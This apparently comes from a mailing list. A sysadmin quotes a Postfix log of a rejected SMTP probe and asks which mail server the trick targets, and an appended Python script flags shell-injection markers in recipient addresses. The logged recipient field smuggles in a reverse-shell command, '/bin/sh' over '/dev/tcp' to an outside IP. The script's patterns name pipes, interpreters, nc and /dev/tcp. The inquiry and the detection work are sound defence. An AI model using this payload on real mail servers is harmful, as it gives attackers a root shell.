A friend's Mac running Postfix logged this rejected attack:

  Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<b...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>

Of course this particular message was blocked at the HELO stage.  But
I was curious as to what attack vector this was trying to exploit and
against what mail transport agent?  I searched the web quite a bit and
didn't see this particular attack discussed anywhere.

Obviously the /dev/tcp/host/port part is trying to connect back to a
C&C host and attach the network connection to a root shell.  I
understand the shell scripting part of the attack fine.

The remote MTA security exploit I couldn't locate references to was
the "to=<root+:|exec /bin/sh ..." part of the attack.  What MTA is
vulnerable to "+:|" in the To address?  Or perhaps none are and this
is simply a failed probe attempt?

Thanks,
Bob
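Added example, not part of Bob's post: a small Python triage script that parses Postfix smtpd "NOQUEUE: reject" lines like the one quoted above and flags recipient addresses carrying shell command-injection markers, so such probes can be spotted in the log even when Postfix already rejected them. The regexes, the indicator heuristics and the benign second log line are my own constructions.

```python
import re

# Layout of a Postfix smtpd "NOQUEUE: reject: RCPT" line (field names are Postfix's
# own). to= is matched greedily because the quoted payload contains literal '>'.
REJECT_RE = re.compile(
    r"postfix/smtpd\[\d+\]: NOQUEUE: reject: RCPT from (?P<client>\S+): "
    r"(?P<code>\d{3} \S+) <(?P<arg>[^>]*)>: (?P<reason>.*?); from=<(?P<sender>[^>]*)> "
    r"to=<(?P<rcpt>.*)> proto=(?P<proto>\S+) helo=<(?P<helo>[^>]*)>"
)

# Heuristic markers of shell injection in a recipient local-part (my own choice).
SUSPICIOUS = [
    (re.compile(r"\|"), "pipe to command"),
    (re.compile(r"\b(exec|sh|bash|nc|perl|python)\b"), "shell or interpreter name"),
    (re.compile(r"/dev/tcp/"), "bash network redirect"),
    (re.compile(r"[<>]&?\d"), "file-descriptor redirection"),
]

# Constructed sample: the post's line rejoined, plus a benign plus-addressed recipient.
SAMPLE_LOG = [
    "Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from "
    "unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need "
    "fully-qualified hostname; from=<b...@dick.com> to=<root+:|exec /bin/sh "
    "0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>",
    "Feb 11 22:01:03 mailer postfix/smtpd[3710]: NOQUEUE: reject: RCPT from "
    "mail.example.org[192.0.2.10]: 450 4.1.8 <sender@example.org>: Sender address "
    "rejected: Domain not found; from=<sender@example.org> "
    "to=<bob+lists@example.net> proto=ESMTP helo=<mail.example.org>",
]

def parse_reject(line):
    """Return the named fields of a reject line, or None if it is not one."""
    m = REJECT_RE.search(line)
    return m.groupdict() if m else None

def injection_indicators(rcpt):
    """Heuristics that fire on the local-part (text before '@', or all of it)."""
    local = rcpt.partition("@")[0]
    return [label for rx, label in SUSPICIOUS if rx.search(local)]

def triage(lines):
    """Reject lines whose recipient looks like a command-injection probe."""
    findings = []
    for line in lines:
        rec = parse_reject(line)
        if rec is None:
            continue
        hits = injection_indicators(rec["rcpt"])
        if hits:
            findings.append({"client": rec["client"], "helo": rec["helo"],
                             "rcpt": rec["rcpt"], "indicators": hits})
    return findings
```

A plain plus-addressed recipient such as bob+lists is not flagged; only the pipe, interpreter name, /dev/tcp redirect and fd redirections trip the heuristics.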
